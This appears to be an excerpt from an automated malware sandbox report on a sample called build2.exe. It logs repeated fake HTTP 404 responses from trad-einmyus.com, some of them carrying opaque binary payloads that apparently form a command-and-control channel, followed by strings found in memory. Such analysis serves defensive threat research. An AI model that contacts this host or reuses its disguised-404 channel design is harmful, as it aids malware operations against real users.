            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Sat, 25 May 2024 19:29:37 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Sat, 25 May 2024 19:29:38 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Sat, 25 May 2024 19:29:41 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 35 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 90 51 10 25 01 f1 a0 89 b3 bf 05 ab 11 df 76 be 59 51 96 01 bf ea 26 ed 65 5e 12 b3 f2 92 4a f5 04 0d 0a 30 0d 0a 0d 0a Data Ascii: 35I:82OQ%vYQ&e^J0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Sat, 25 May 2024 19:29:45 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 66 0d 0a 04 00 ed 98 a4 08 a8 37 33 7c 09 c7 22 84 f6 82 af 73 32 f3 a2 68 33 54 27 c3 83 be 8e 99 1e a2 08 c9 63 a5 53 63 97 09 f8 ea 22 e5 38 69 15 b9 e0 9e 0f a2 17 c9 02 94 a7 7a d4 60 a6 bc 8d 14 3b 84 c3 3f 44 88 dd ca 0a 86 89 a2 0c bd 74 0d 0a 30 0d 0a 0d 0a Data Ascii: 4f73|"s2h3T'cSc"8iz`;?Dt0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Sat, 25 May 2024 19:29:46 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Sat, 25 May 2024 19:29:48 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Sat, 25 May 2024 19:29:52 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 32 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 89 43 14 78 1d e4 a3 8f ba a8 15 ea 1f d1 6f f8 62 7a b9 35 e3 e8 2d e9 3f 46 50 b9 e1 d9 0d 0a 30 0d 0a 0d 0a Data Ascii: 32I:82OCxobz5-?FP0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Sat, 25 May 2024 19:29:55 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Sat, 25 May 2024 19:29:59 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Sat, 25 May 2024 19:29:59 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Sat, 25 May 2024 19:30:01 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Sat, 25 May 2024 19:30:02 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Sat, 25 May 2024 19:30:03 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 37 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 98 d6 08 5e 39 5c a2 f3 df fc fc 48 eb 0b db 69 f9 53 47 91 0d 0a 30 0d 0a 0d 0a Data Ascii: 27I:82O^9\HiSG0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Sat, 25 May 2024 19:30:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 63 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 13 49 3a 47 a4 e8 dd e1 e4 40 f0 4f 91 64 b2 45 48 95 01 bf ec 31 e5 0d 0a 30 0d 0a 0d 0a Data Ascii: 2cI:82OI:G@OdEH10
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Sat, 25 May 2024 19:30:23 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 31 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc ab 15 b0 08 db 6f a7 18 5c 9b 08 bf eb 3b af 2d 50 0a f3 dd c6 5b ee 52 c6 41 83 aa 76 d2 26 eb b2 c7 18 7e 0d 0a 30 0d 0a 0d 0a Data Ascii: 41I:82OTeo\;-P[RAv&~0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Sat, 25 May 2024 19:30:25 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 34 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 de 15 49 39 41 a3 e8 dd e1 f8 5f f5 4a 89 2d bb 53 51 90 4a fb ef 2c f3 2b 42 1a ae b7 d9 57 e8 0d 0a 30 0d 0a 0d 0a Data Ascii: 34I:82OI9A_J-SQJ,+BW0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Sat, 25 May 2024 19:30:31 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 63 31 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 84 42 09 25 16 f9 b5 8f bd b8 15 a5 0c ce 2c b4 59 52 db 04 e5 fd 28 e3 22 58 1b b2 ed cf 00 bc 53 da 46 d4 f7 20 86 24 e6 ad 90 52 23 e5 b4 4c 2b f8 a5 b4 6a f6 99 bc 5d af 72 94 cb 32 45 5d 39 0f 4e df a1 3d fd d4 55 84 ac c8 42 c6 36 9d 95 69 77 64 f9 7a 3a 9c c6 9d c6 76 ed 39 08 84 5a b0 4d e3 e6 d3 36 81 c7 fc 3f d7 38 f9 fb 91 e0 01 83 c4 c3 4c 1c c3 03 ae eb b4 c0 a9 ac 4f 1c ff 74 88 d8 29 82 7b 32 45 b6 88 f9 b7 ae 1a b1 4b 64 c0 c6 ba e2 d9 ba 78 d6 27 35 60 3a 6a e8 81 03 9d 78 ab a8 af 2d 90 d6 d7 44 0d 0a 30 0d 0a 0d 0a Data Ascii: c1I:82OB%,YR("XSF $R#L+j]r2E]9N=UB6iwdz:v9ZM6?8LOt){2EKdx'5`:jx-D0
            Source: build2.exe, 00000013.00000003.2122792993.0000000000843000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
            Source: explorer.exe, 00000001.00000000.1688547736.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1690075566.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
            Source: build2.exe, 00000013.00000003.2373219434.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2373406242.0000000000903000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
            Source: build2.exe, 00000013.00000003.2373219434.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2373406242.0000000000903000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
